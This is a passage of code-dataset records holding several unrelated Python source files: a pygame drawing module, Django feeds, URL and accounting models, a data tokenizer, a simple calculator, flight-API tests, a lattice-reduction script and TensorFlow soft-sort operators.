шрифты из main\n game_time - время завершенной игры\"\"\"\n go_txt = font_huge.render('ПАУЗА', True, (0, 137, 204))\n go_rec = go_txt.get_rect()\n go_rec.center = (win_w / 2, win_h / 3)\n win.blit(go_txt, go_rec)\n\n yres_txt = font_normal.render('Ваше время: ' + str(round(game_time, 1)) + 'С', True, (0, 137, 204))\n yres_rec = yres_txt.get_rect()\n yres_rec.center = (win_w / 2, win_h / 3 + 100 * scaling)\n win.blit(yres_txt, yres_rec)\n\n res_txt = font_small.render('Нажмите ENTER ��ля продолжения...', True, (0, 137, 204))\n res_rec = res_txt.get_rect()\n res_rec.center = (win_w / 2, 2 * win_h / 3 + 50 * scaling)\n win.blit(res_txt, res_rec)\n\n\ndef draw_plane(win, x, y, plane, plane_dmg, vulnerable):\n \"\"\"Процедура, при вызове которой отрисовывается самолётик\n Аргументы:\n win - окно отрисовки\n x - координата самолётика по оси Х (верхний левый угол)\n y - координата самолётика по оси Y (верхний левый угол)\n plane - файл plane.png (обычный самолётик)\n plane_png - файл plane_dmg.png (самолётик после ранения)\n vulnerable - флаг, говорящий о том уязвим самолётик или нет\"\"\"\n if vulnerable: # Рисуем самолётик\n win.blit(plane, (x, y))\n else:\n win.blit(plane_dmg, (x, y))\n\n\ndef lives_counter(win, font, lives):\n \"\"\"Процедура, при вызове которой отрисовывается текущее количество жизней\n Аргументы:\n win - окно отрисовки\n font - шрифт\n lives - переменная, отвечающая за количество жизней\"\"\"\n lives_txt = font.render(lives * \"*\", True, (0, 137, 204))\n win.blit(lives_txt, (10 * scaling, 10 * scaling))\n\n\ndef print_time(win, font, time):\n \"\"\"Процедура, при вызове которой отрисовывается время текущей игры\n Аргументы:\n win - окно отрисовки\n font - шрифт\n time - переменная, отвечающая за отсчет времени\"\"\"\n time_txt = font.render(str(round(time, 1)) + \" С\", True, (0, 137, 204))\n time_rec = time_txt.get_rect()\n time_rec.center = (win_w / 2, 27 * scaling)\n win.blit(time_txt, time_rec)\n","sub_path":"painting.py","file_name":"painting.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"4190617","text":"\"\"\"RSS and Atom feeds for the reader app.\"\"\"\n\nfrom __future__ import annotations\n\nfrom mimetypes import guess_type\nfrom typing import TYPE_CHECKING, Iterable, Optional\n\nfrom django.conf import settings\nfrom django.contrib.syndication.views import Feed\nfrom django.db.models import F, Prefetch\nfrom django.utils import timezone as tz\nfrom django.utils.decorators import method_decorator\nfrom django.utils.feedgenerator import Atom1Feed\nfrom django.views.decorators.cache import cache_control\n\nfrom .models import Category, Chapter, Series\n\nif TYPE_CHECKING: # pragma: no cover\n from datetime import datetime # isort:skip\n from django.http import HttpRequest # isort:skip\n\n_max = settings.CONFIG['MAX_RELEASES']\n\n\n@method_decorator(cache_control(public=True, max_age=600), '__call__')\nclass LibraryRSS(Feed):\n \"\"\"RSS feed for the series library.\"\"\"\n ttl = 600\n link = '/reader/'\n description = 'Updates when a new series is added'\n author_name = settings.CONFIG['NAME']\n title = f'Library - {author_name}'\n item_guid_is_permalink = True\n\n def items(self) -> Iterable[Series]:\n \"\"\"\n Get an iterable of the feed's items.\n\n :return: An iterable of ``Series`` objects.\n \"\"\"\n categories = Category.objects.only('name')\n return Series.objects.only(\n 'slug', 'title', 'description',\n 'cover', 'created', 'modified'\n 
).prefetch_related(\n Prefetch('categories', queryset=categories)\n ).order_by('-created')[:_max]\n\n def item_description(self, item: Series) -> str:\n \"\"\"\n Get the description of the item.\n\n :param item: A ``Series`` object.\n\n :return: The description of the series.\n \"\"\"\n return item.description.replace('\\n', '
')\n\n def item_categories(self, item: Series) -> Iterable[str]:\n \"\"\"\n Get the categories of the item.\n\n :param item: A ``Series`` object.\n\n :return: The names of the series' categories.\n \"\"\"\n return [c.name for c in item.categories.all()]\n\n def item_pubdate(self, item: Series) -> datetime:\n \"\"\"\n Get the publication date of the item.\n\n :param item: A ``Series`` object.\n\n :return: The date the series was created.\n \"\"\"\n return item.created\n\n def item_updateddate(self, item: Series) -> datetime:\n \"\"\"\n Get the update date of the item.\n\n :param item: A ``Series`` object.\n\n :return: The date the series was modified.\n \"\"\"\n return item.modified\n\n def item_enclosure_url(self, item: Series) -> Optional[str]:\n \"\"\"\n Get the enclosure URL of the item.\n\n :param item: A ``Series`` object.\n\n :return: The URL of the series' cover image, if available.\n \"\"\"\n return item.cover.url if item.cover else None\n\n def item_enclosure_length(self, item: Series) -> Optional[int]:\n \"\"\"\n Get the enclosure length of the item.\n\n :param item: A ``Series`` object.\n\n :return: The size of the series' cover image, if available.\n \"\"\"\n return item.cover.size if item.cover else None\n\n def item_enclosure_mime_type(self, item: Series) -> Optional[str]:\n \"\"\"\n Get the enclosure type of the item.\n\n :param item: A ``Series`` object.\n\n :return: The mime type of the series' cover image, if available.\n \"\"\"\n return guess_type(item.cover.path)[0] if item.cover else None\n\n\n@method_decorator(cache_control(public=True, max_age=600), '__call__')\nclass LibraryAtom(LibraryRSS):\n \"\"\"Atom feed for the series library.\"\"\"\n feed_type = Atom1Feed\n subtitle = LibraryRSS.description\n\n\n@method_decorator(cache_control(public=True, max_age=600), '__call__')\nclass ReleasesRSS(Feed):\n \"\"\"RSS feed for chapter releases.\"\"\"\n ttl = 600\n author_name = settings.CONFIG['NAME']\n item_guid_is_permalink = True\n\n def get_object(self, request: HttpRequest, slug:\n Optional[str] = None) -> Optional[Series]:\n \"\"\"\n Get a ``Series`` object from the request.\n\n :param request: The original request.\n :param slug: The slug of the series.\n\n :return: The series that has the given slug,\n or ``None`` if the slug is ``None``.\n \"\"\"\n if slug is None:\n return None\n chapters = Chapter.objects.only(\n 'title', 'volume', 'number',\n 'published', 'modified', 'series'\n ).filter(\n published__lte=tz.now(),\n series__licensed=False\n ).order_by(F('volume').asc(nulls_last=True), 'number')\n return Series.objects.only(\n 'slug', 'title', 'licensed', 'format'\n ).prefetch_related(\n Prefetch('chapters', queryset=chapters)\n ).get(slug=slug)\n\n def link(self, obj: Optional[Series]) -> str:\n \"\"\"\n Get the link of the feed's page.\n\n :param obj: The object of the feed.\n\n :return: The URL of the series, or the home page.\n \"\"\"\n return obj.get_absolute_url() if obj else '/'\n\n def title(self, obj: Optional[Series]) -> str:\n \"\"\"\n Get the title of the feed.\n\n :param obj: The object of the feed.\n\n :return: The title of the series, or ``Releases``.\n \"\"\"\n title = obj.title if obj else 'Releases'\n return f'{title} - {self.author_name}'\n\n def description(self, obj: Optional[Series]) -> str:\n \"\"\"\n Get the description of the feed.\n\n :param obj: The object of the feed.\n\n :return: A description with the title of the series, if available.\n \"\"\"\n if obj is None:\n return 'Updates when a new chapter is added'\n if obj.licensed: # 
pragma: no cover\n return 'This series is licensed.'\n return f'Updates when a new chapter of {obj.title} is added'\n\n def items(self, obj: Optional[Series]) -> Iterable[Chapter]:\n \"\"\"\n Get an iterable of the feed's items.\n\n :param obj: The object of the feed.\n\n :return: An iterable of ``Chapter`` objects.\n \"\"\"\n if getattr(obj, 'licensed', False): # pragma: no cover\n return []\n if hasattr(obj, 'chapters'):\n return list(obj.chapters.all()) # type: ignore\n return Chapter.objects.only(\n 'title', 'volume', 'number', 'published', 'modified',\n 'series__slug', 'series__title', 'series__format'\n ).select_related('series').filter(\n published__lte=tz.now(), series__licensed=False\n ).order_by('-published')[:_max]\n\n def item_description(self, item: Chapter) -> str:\n \"\"\"\n Get the description of the item.\n\n :param item: A ``Chapter`` object.\n\n :return: The ``Chapter`` object as a string.\n \"\"\"\n desc = str(item)\n if settings.CONFIG['ALLOW_DLS']:\n domain = settings.CONFIG['DOMAIN']\n url = item.get_absolute_url()[:-1] + '.cbz'\n scheme = settings.ACCOUNT_DEFAULT_HTTP_PROTOCOL\n desc = f'{desc}'\n return desc\n\n def item_pubdate(self, item: Chapter) -> datetime:\n \"\"\"\n Get the publication date of the item.\n\n :param item: A ``Chapter`` object.\n\n :return: The date the chapter was published.\n \"\"\"\n return item.published\n\n def item_updateddate(self, item: Chapter) -> datetime:\n \"\"\"\n Get the update date of the item.\n\n :param item: A ``Chapter`` object.\n\n :return: The date the chapter was modified.\n \"\"\"\n return item.modified\n\n\n@method_decorator(cache_control(public=True, max_age=600), '__call__')\nclass ReleasesAtom(ReleasesRSS):\n \"\"\"Atom feed for chapter releases.\"\"\"\n feed_type = Atom1Feed\n subtitle = ReleasesRSS.description\n\n\n__all__ = ['LibraryRSS', 'LibraryAtom', 'ReleasesRSS', 'ReleasesAtom']\n","sub_path":"reader/feeds.py","file_name":"feeds.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"471947962","text":"import os.path\nfrom argparse import ArgumentParser\nfrom typing import Iterable, Dict, Any, List\nfrom random import random\nfrom collections import Counter\n\nfrom utils.constants import INPUTS, SAMPLE_ID, OUTPUT, SMALL_NUMBER, TIMESTAMP\nfrom utils.file_utils import iterate_files, read_by_file_suffix\nfrom utils.data_writer import DataWriter\n\n\nLABEL = 'label'\nLABELS = 'labels'\nFREQ = 0.01 # This is a parameter of the dataset\n\n\ndef from_sensor(label: str, sensors: List[str]) -> bool:\n for sensor in sensors:\n if label.startswith(sensor):\n return True\n return False\n\n\ndef get_data_iterator(input_folder: str, sensors: List[str]) -> Iterable[Dict[str, Any]]:\n data_files = iterate_files(input_folder, pattern='.*jsonl.gz')\n for data_file in data_files:\n for sample in read_by_file_suffix(data_file):\n data_dict: Dict[str, Any] = dict()\n data_dict[OUTPUT] = sample[LABEL]\n data_dict[INPUTS] = [val for key, val in sorted(sample.items()) if from_sensor(key, sensors)]\n data_dict[TIMESTAMP] = sample[TIMESTAMP]\n yield data_dict\n\n\ndef majority(labels: List[int]) -> int:\n label_counter: Counter = Counter()\n for label in labels:\n label_counter[label] += 1\n return label_counter.most_common(1)[0][0]\n\n\ndef tokenize_data(input_folder: str,\n output_folder: str,\n window: int,\n stride: int,\n skip_labels: List[int],\n sensors: List[str],\n file_prefix: str,\n chunk_size: int,\n sample_frac: float):\n 
\"\"\"\n Function to tokenize activity datasets.\n \"\"\" \n data_iterator = get_data_iterator(input_folder, sensors=sensors)\n\n with DataWriter(output_folder, file_prefix=file_prefix, file_suffix='jsonl.gz', chunk_size=chunk_size) as writer:\n\n sample_id = 0\n data_window: List[Dict[str, Any]] = []\n stride_counter = stride\n label_counter = Counter()\n\n for data_index, data_sample in enumerate(data_iterator):\n # Skip data according to the stride policy\n if stride_counter < stride:\n stride_counter += 1\n continue\n\n # Create windows of sufficient size and validate timestamps\n if len(data_window) == 0:\n data_window.append(data_sample)\n elif abs(data_sample[TIMESTAMP] - data_window[-1][TIMESTAMP]) > FREQ + SMALL_NUMBER:\n data_window = [data_sample]\n else:\n data_window.append(data_sample)\n\n if len(data_window) == window:\n labels = [elem[OUTPUT] for elem in data_window]\n label = majority(labels)\n\n element = {\n SAMPLE_ID: sample_id,\n INPUTS: [sample[INPUTS] for sample in data_window],\n OUTPUT: label,\n LABELS: labels,\n TIMESTAMP: data_window[-1][TIMESTAMP]\n }\n\n # Perform sample filtering\n r = random()\n if (skip_labels is None or label not in skip_labels) and r < sample_frac:\n writer.add(element)\n sample_id += 1\n stride_counter = 0\n label_counter[label] += 1\n\n # Reset the data window\n data_window = []\n\n if (sample_id + 1) % chunk_size == 0:\n print(f'Completed {data_index + 1} samples.', end='\\r')\n\n print()\n print(f'Completed processing. Total of {sample_id + 1} samples')\n print('Label Distribution:')\n for key, val in sorted(label_counter.items()):\n frac = val / sample_id\n print(f'{key}: {val} ({frac:.3f})')\n\n\nif __name__ == '__main__':\n parser = ArgumentParser('Script to create tokenized activity datasets.')\n parser.add_argument('--input-folder', type=str, required=True)\n parser.add_argument('--output-folder', type=str, required=True)\n parser.add_argument('--window', type=int, required=True)\n parser.add_argument('--stride', type=int, required=True)\n parser.add_argument('--skip-labels', type=int, nargs='*')\n parser.add_argument('--sensors', type=str, nargs='+', choices=['hand', 'chest', 'ankle'])\n parser.add_argument('--file-prefix', type=str, default='data')\n parser.add_argument('--chunk-size', type=int, default=5000)\n parser.add_argument('--sample-frac', type=float, default=1.0)\n args = parser.parse_args()\n\n # Validate arguments\n assert os.path.exists(args.input_folder), f'The folder {args.input_folder} does not exist!'\n assert 0 < args.sample_frac and args.sample_frac <= 1.0, 'The sample fraction must be in the range (0, 1]'\n assert args.window > 0, 'Must have a positive window size'\n assert args.stride > 0, 'Must have a positive stride'\n\n tokenize_data(input_folder=args.input_folder,\n output_folder=args.output_folder,\n window=args.window,\n stride=args.stride,\n skip_labels=args.skip_labels,\n sensors=args.sensors,\n file_prefix=args.file_prefix,\n chunk_size=args.chunk_size,\n sample_frac=args.sample_frac)\n","sub_path":"src/data_generation/activity/tokenize_activity_data.py","file_name":"tokenize_activity_data.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"530081126","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', index, name='users'),\n path('users/', detail, name='user'),\n path('create', create, name='create_user'),\n path('edit/', edit, name='edit_user'),\n path('delete/', 
delete_user, name='delete_user'),\n\n]","sub_path":"sprint_14-18_[django,orm,view,templates,forms,REST]/Library App/authentication/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"179695268","text":"import re\r\n\r\nprevious=0\r\nrun=True\r\n\r\ndef perform_math():\r\n global run\r\n global previous\r\n equation=\"\"\r\n if previous==0:\r\n equation=input(\"Enter Equation:\")\r\n else:\r\n equation=input(str(previous))\r\n if equation==\"quit\":\r\n run=False\r\n else:\r\n equation=re.sub('[^0-9^+^-^*^/]','',equation)\r\n if previous==0:\r\n previous = eval(equation)\r\n else:\r\n previous=eval(str(previous)+equation)\r\n\r\n print(equation)\r\n\r\n\r\nwhile run:\r\n perform_math()\r\n","sub_path":"BasicCalculator/Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"303239955","text":"import pytest\nfrom pyramid.testing import DummyRequest\nfrom webob.multidict import MultiDict\n\nfrom airflight.views.api.v1.flight.exceptions import \\\n OriginIsTheSameAsTheDestination\n\n\nclass TestAPIFlight:\n def test_get_route_without_connections(self, app, data):\n \"\"\"\n Get best route without connections when the airline is United Airlines\n \"\"\"\n from airflight.views.api.v1.flight.flight import FlightAPI\n req = DummyRequest(method='GET')\n req.params = MultiDict([('origin', 'ANK'), ('destination', 'YYZ')])\n get_route = FlightAPI(req).get_best_route()\n assert len(get_route['data']) == 1\n assert get_route['data'][0]['airline'] == {'name': 'United Airlines',\n '2_digit_code': 'UA',\n '3_digit_code': 'UAL',\n 'country': 'United States'}\n\n def test_get_route_with_two_connections(self, app, data):\n \"\"\"\n Get best route with two connections when the airlines origin is\n United Airlinesand the connection is Turkish Airlines\n \"\"\"\n from airflight.views.api.v1.flight.flight import FlightAPI\n req = DummyRequest(method='GET')\n req.params = MultiDict([('origin', 'YWH'), ('destination', 'ANK')])\n get_route = FlightAPI(req).get_best_route()\n assert len(get_route['data']) == 2\n assert get_route['data'][0]['airline'] == {'name': 'United Airlines',\n '2_digit_code': 'UA',\n '3_digit_code': 'UAL',\n 'country': 'United States'}\n\n assert get_route['data'][1]['airline'] == {'name': 'Turkish Airlines',\n '2_digit_code': 'TK',\n '3_digit_code': 'THY',\n 'country': 'Turkey'}\n\n def test_get_route_when_exist_two_different_routes(self, app, data):\n \"\"\"\n Test when exist different routes\n Route 1: (YWH -> YYZ) -> (YYZ -> ANK) -> (ANK -> ADA)\n Route 2: (YWH -> ADA)\n\n In this case the system chooses Route 2\n \"\"\"\n from airflight.views.api.v1.flight.flight import FlightAPI\n req = DummyRequest(method='GET')\n req.params = MultiDict([('origin', 'YWH'), ('destination', 'ADA')])\n get_route = FlightAPI(req).get_best_route()\n assert len(get_route['data']) == 1\n\n def test_get_route_origin_is_the_same_as_destination(self, app):\n from airflight.views.api.v1.flight.flight import FlightAPI\n req = DummyRequest(method='GET')\n req.params = MultiDict([('origin', 'YWH'), ('destination', 'YWH')])\n with pytest.raises(OriginIsTheSameAsTheDestination):\n 
FlightAPI(req).get_best_route()\n","sub_path":"airflight/tests/views/api/v1/flight/test_flight.py","file_name":"test_flight.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"252455183","text":"import numpy, math\n\ndef gaussianReduction(vectors):\n if len(vectors)==2:\n v1=numpy.array(vectors[0])\n v2=numpy.array(vectors[1])\n while True:\n if numpy.dot(v2,v2) < numpy.dot(v1,v1):\n tmp = v1\n v1 = v2\n v2 =tmp\n m = math.floor(numpy.dot(v2,v1)/numpy.dot(v1,v1))\n if m==0:\n return [v1,v2]\n v2 = v2 - m*v1\n else:\n print(\"You must supply an array containing 2 vectors\")\n\nreducted = gaussianReduction( [[87502093, 123094980], [846835985, 9834798552]] )\nr1 = reducted[0]\nr2 = reducted[1]\nprint(r1[0]*r2[0]+r1[1]*r2[1])\nprint(numpy.dot(r1,r2))\n","sub_path":"old/gaussian lattice reduction.py","file_name":"gaussian lattice reduction.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"411408854","text":"# From Django\nfrom django.utils.translation import ugettext_lazy as _ # To mark strings for translations\nfrom django.db import models\nfrom django.db.models.signals import pre_save, post_save, pre_delete\n\n# Our modules\nfrom infra.models.record_owner import RecordOwner\nfrom common.models.app_entity import AppEntity\nfrom infra.custom.fields import CodeField, CharNullField, DescriptionField\nfrom infra.custom.audit_handlers import audit_update_handler, audit_add_handler, audit_delete_handler\nfrom common.models.currency import Currency\nfrom common.models.forex import ForexDealer\nfrom bin.constants import WORD_SEPARATOR\n\nclass Company(AppEntity):\n \"\"\"\n Companies of the Organisation using this Application.\n\n A Company will own a Set of Books in Accounting. This maps\n to the company segment in most General Ledger systems.\n A Company in turn may have 1 or more Profit Centres, each\n of which may map to 0 or more Branches. A Branch has a\n 1 to 1 mapping with Business Unit. A User must belong to a\n Business Unit, which may be a Branch (leaf-node) or a parent\n of 1 or more Branches. In the former case, he has a single\n Company to post his transactions to while the latter allows\n him to choose for each transactions. But in practical cases,\n the Company a transaction belongs to depends on the customer\n Account (ie which Branch it belongs to), not which Branch the\n User belongs to. \n \n Sometimes, it is overridden by Transaction Type. An \n organisation may have several lines of business which\n belongs to different Companies and is carried out in all its Branches.\n An example would be a Bank whose main business is Banking (ie\n Savings, Fixed Deposits etc) but a Branch may also have\n Safe Deposit Box services which is owned by another Company.\n So any transactions of the latter services is posted to \n this other Company even though both types of transaction\n is captured by the same Application.\n\n The difference between Business Units and Companies is that\n the former represents the Management control of the Organisation\n while the latter is the Accounting control. 
We would always use\n Business Units for Users, Branches, Accounts etc while the Company\n chosen will always follow the transaction (ie, who owns the transaction).\n \"\"\"\n # unique company code\n company_code = CodeField(verbose_name=_(\"Company Code\"), unique=True)\n # and a name will be from AppEntity\n\n # GL Account Segment for this Company, most GL system will have Chart of Account coding\n # with Co-Div-Dept-Acc structure. This represents to Co part.\n company_account_segment = CharNullField(verbose_name=_(\"Company GL Account\"), max_length=30,\n help_text=_(\"GL Account used for this Company\"))\n # Functional (ie Accounting) Currency for this Company, when null will use AppRegistry(FUNCTIONAL-CURRENCY)\n functional_currency = models.ForeignKey(Currency, verbose_name=_(\"Functional Currency\"), blank=True, null=True,\n help_text=_(\"Functional Currency for accounting of this Company\"))\n # Forex Dealer for exchange rate quotes, when null will use AppRegistry(DEFAULT-FOREX-DEALER)\n forex_dealer = models.ForeignKey(ForexDealer, verbose_name=_(\"Forex Dealer\"), blank=True, null=True,\n help_text=_(\"Exchange rates from this Forex Dealer\"))\n\n class Meta:\n verbose_name = _(\"Company\")\n verbose_name_plural = _(\"Companies\")\n app_label = 'common'\n db_table = 'cm_company'\n\n def __unicode__(self):\n return self.entity_name\n\n def save(self, force_insert=False, force_update=False):\n # Set Entity Type\n self.entity_type = 'CO'\n # Perform the actual save\n super(Company, self).save(force_insert, force_update)\n\n# Register the audit update handler\npre_save.connect(audit_update_handler, sender=Company)\n# Register the audit add handler\npost_save.connect(audit_add_handler, sender=Company)\n# Register the audit delete handler\npre_delete.connect(audit_delete_handler, sender=Company)\n\nclass ProfitCentre(RecordOwner):\n \"\"\"\n Profit Centres within each Company. \n \n If a Company has branches, then each branch should be a Profit Centre.\n Other Profit Centres may be by line of business, eg Product Divisions.\n\n The Headquarters Clearing Account is used for Inter-Branch transactions.\n When Branch A collects payment against its own Bill, it will\n Dr Bank and Cr Debtor. When it collects payment for Branch B's Bill, it\n will Dr Bank and Cr Branch A HQ Clr Account and generate another set of\n entries, Dr Branch B HQ Clr Account and Cr Debtor. 
At the end of the\n day, week or month, each Branch will settle with HQ its clearing balances.\n If in Cr, then the Branch will have to pay HQ.\n \"\"\"\n # Profit Centre is within a Company\n company = models.ForeignKey(Company, on_delete=models.PROTECT, verbose_name=_(\"Company\"))\n # Unique code within company\n profit_centre_code = CodeField(verbose_name=_(\"Profit Centre Code\"))\n # Description\n centre_description = DescriptionField(verbose_name=_(\"Description\"), \n help_text=_(\"A Description of this Profit Centre\"))\n # Up to 3 GL Account Segments to use for this Profit Centre, eg div-dept-section\n # The full GL Account code is made up of Company-Seg1-Seg2-Seg3-Account\n account_segment_1 = CharNullField(verbose_name=_(\"GL Segment 1\"), max_length=30,\n help_text=_(\"GL Segment 1 code used for this Profit Centre\"))\n account_segment_2 = CharNullField(verbose_name=_(\"GL Segment 2\"), max_length=30,\n help_text=_(\"GL Segment 2 code used for this Profit Centre\"))\n account_segment_3 = CharNullField(verbose_name=_(\"GL Segment 3\"), max_length=30,\n help_text=_(\"GL Segment 3 code used for this Profit Centre\"))\n # Clearing Account with HeadQuarters. See above for explanation. When not maintained, inter-branch\n # transaction must belong to the same Profit Centre, else the GL posting will fail (but the original\n # transaction can be completed normally) until somebody defines this field.\n headquarters_clearing_account = CharNullField(verbose_name=_(\"HQ Clearing Account\"), max_length=30,\n help_text=_(\"Clearing GL Account for this Profit Centre with HeadQuarters\"))\n\n class Meta:\n unique_together = ('company', 'profit_centre_code')\n verbose_name = _(\"Profit Centre\")\n app_label = 'common'\n db_table = 'cm_profit_centre'\n\n def __unicode__(self):\n return unicode(self.company) + WORD_SEPARATOR + self.centre_description\n\n# Register the audit update handler\npre_save.connect(audit_update_handler, sender=ProfitCentre)\n# Register the audit add handler\npost_save.connect(audit_add_handler, sender=ProfitCentre)\n# Register the audit delete handler\npre_delete.connect(audit_delete_handler, sender=ProfitCentre)\n\nclass InterCompanyAccount(RecordOwner):\n \"\"\"\n Inter-Company Clearing Accounts for a Profit Centre.\n\n This is used for inter-Company transactions, eg collecting \n payment against a Bill belonging to a customer Account of\n another Branch that belongs to another Company. \n Normally when a Branch of Company A receive payment for its own Bills, \n it will Dr Bank and Cr Debtor but when it receive money \n against Bills of a Branch of Company B, then it needs to \n Dr Bank Cr Company B Clearing Account in its own\n accounts (Company A) and the same transaction will generate \n another set of entries for Company B, ie Dr Company A \n Account and Cr Debtor. At the end of day, week or month,\n there will be a settlement process between clearing and\n and company accounts.\n \"\"\"\n # Profit Centre to define clearing accounts for...\n profit_centre = models.ForeignKey(ProfitCentre, on_delete=models.PROTECT, verbose_name=_(\"Profit Centre\"))\n\n # Clearing Company cannot be the same as Profit Centre\n clearing_company = models.ForeignKey(Company, on_delete=models.PROTECT, verbose_name=_(\"Clearing Company\"))\n # GL Account within this Profit Centre maintained for Clearing Company. 
The other GL segments will come\n # from the Profit Centre above.\n clearing_gl_account = CharNullField(verbose_name=_(\"Clearing Account\"), max_length=30,\n help_text=_(\"Clearing GL Account in this Profit Centre for Clearing Company\"))\n # GL Account within Clearing Company maintained for this Profit Centre.\n company_gl_account = CharNullField(verbose_name=_(\"Company Account\"), max_length=30,\n help_text=_(\"GL Account maintained by Clearing Company for this Profit Centre\"))\n\n class Meta:\n unique_together = ('profit_centre', 'clearing_company')\n verbose_name = _(\"Inter-Company Clearing\")\n app_label = 'common'\n db_table = 'cm_inter_company_clearing'\n\n def __unicode__(self):\n return unicode(self.profit_centre) + WORD_SEPARATOR + unicode(self.clearing_company)\n\n# Register the audit update handler\npre_save.connect(audit_update_handler, sender=InterCompanyAccount)\n# Register the audit add handler\npost_save.connect(audit_add_handler, sender=InterCompanyAccount)\n# Register the audit delete handler\npre_delete.connect(audit_delete_handler, sender=InterCompanyAccount)\n\n","sub_path":"common/models/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":9290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"554860955","text":"# coding=utf-8\n# Copyright 2019 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"This module defines the softranks and softsort operators.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nfrom __future__ import print_function\n\nimport tensorflow.compat.v2 as tf\nfrom soft_sort import soft_quantilizer\n\n\nDIRECTIONS = ('ASCENDING', 'DESCENDING')\n\n\ndef _preprocess(x, axis):\n \"\"\"Reshapes the input data to make it rank 2 as required by SoftQuantilizer.\n\n The SoftQuantilizer expects an input tensor of rank 2, where the first\n dimension is the batch dimension and the soft sorting is applied on the second\n one.\n\n Args:\n x: Tensor of any dimension.\n axis: (int) the axis to be turned into the second dimension.\n\n Returns:\n a Tensor[batch, n] where n is the dimensions over the axis and batch\n the product of all other dimensions\n \"\"\"\n dims = list(range(x.shape.rank))\n dims[-1], dims[axis] = dims[axis], dims[-1]\n z = tf.transpose(x, dims) if dims[axis] != dims[-1] else x\n return tf.reshape(z, (-1, tf.shape(x)[axis]))\n\n\ndef _postprocess(x, shape, axis):\n \"\"\"Applies the inverse transformation of _preprocess.\n\n Args:\n x: Tensor[batch, n]\n shape: TensorShape of the desired output.\n axis: (int) the axis along which the original tensor was processed.\n\n Returns:\n A Tensor with the shape given in argument.\n \"\"\"\n s = list(shape)\n s[axis], s[-1] = s[-1], s[axis]\n z = tf.reshape(x, s)\n\n # Transpose to get back to the original shape\n dims = list(range(shape.rank))\n dims[-1], dims[axis] = dims[axis], dims[-1]\n return tf.transpose(z, dims) if dims[axis] != dims[-1] else 
z\n\n\n@tf.function\ndef softsort(x, direction='ASCENDING', axis=-1, **kwargs):\n \"\"\"Applies the softsort operator on input tensor x.\n\n This operator acts as differentiable alternative to tf.sort.\n\n Args:\n x: the input tensor. It can be either of shape [batch, n] or [n].\n direction: the direction 'ASCENDING' or 'DESCENDING'\n axis: the axis on which to operate the sort.\n **kwargs: see SoftQuantilizer for possible parameters.\n\n Returns:\n A tensor of the same shape as the input.\n \"\"\"\n if direction not in DIRECTIONS:\n raise ValueError('`direction` should be one of {}'.format(DIRECTIONS))\n\n z = _preprocess(x, axis)\n descending = (direction == 'DESCENDING')\n sorter = soft_quantilizer.SoftQuantilizer(z, descending=descending, **kwargs)\n return _postprocess(sorter.softsort, x.shape, axis)\n\n\n@tf.function\ndef softranks(x, direction='ASCENDING', axis=-1, zero_based=False, **kwargs):\n \"\"\"A differentiable argsort-like operator that returns directly the ranks.\n\n Note that it behaves as the 'inverse' of the argsort operator since it returns\n soft ranks, i.e. real numbers that play the role of indices and quantify the\n relative standing (among all n entries) of each entry of x.\n\n Args:\n x: Tensor of any shape.\n direction: (str) either 'ASCENDING' or 'DESCENDING', as in tf.sort.\n axis: (int) the axis along which to sort, as in tf.sort.\n zero_based: (bool) to return values in [0, n-1] or in [1, n].\n **kwargs: see SoftQuantilizer for possible parameters.\n\n Returns:\n A Tensor of the same shape as the input containing the soft ranks.\n \"\"\"\n if direction not in DIRECTIONS:\n raise ValueError('`direction` should be one of {}'.format(DIRECTIONS))\n\n descending = (direction == 'DESCENDING')\n z = _preprocess(x, axis)\n sorter = soft_quantilizer.SoftQuantilizer(z, descending=descending, **kwargs)\n ranks = sorter.softcdf * tf.cast(tf.shape(z)[1], dtype=x.dtype)\n if zero_based:\n ranks -= tf.cast(1.0, dtype=x.dtype)\n\n return _postprocess(ranks, x.shape, axis)\n","sub_path":"soft_sort/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"617040929","text":"#!/usr/bin/python\n\nimport datetime, math, os, re, sys\n\ndf = '%Y-%m-%d'\nweekdays = ['Su', 'M', 'Tu', 'W', 'Th', 'F', 'Sa']\n\ndef parse_date(s):\n return datetime.datetime.strptime(s, df)\n\ndef format_date(d):\n return d.strftime(df)\n\ndef actual_date(start, weekday, week):\n day_offset = weekdays.index(weekday)\n return start + datetime.timedelta(days=day_offset, weeks=week-1)\n\ndef term_date(start, date):\n diff = (date - start).days\n week = (diff // 7) + 1\n weekday = date.strftime('%A')\n return (week, weekday)\n\ndef ordinal(n):\n # From http://stackoverflow.com/a/20007730\n a = abs(n)\n return \"%d%s\" % (n,\"tsnrhtdd\"[(math.floor(a/10)%10!=1)*(a%10<4)*a%10::4])\n\nstart_date = 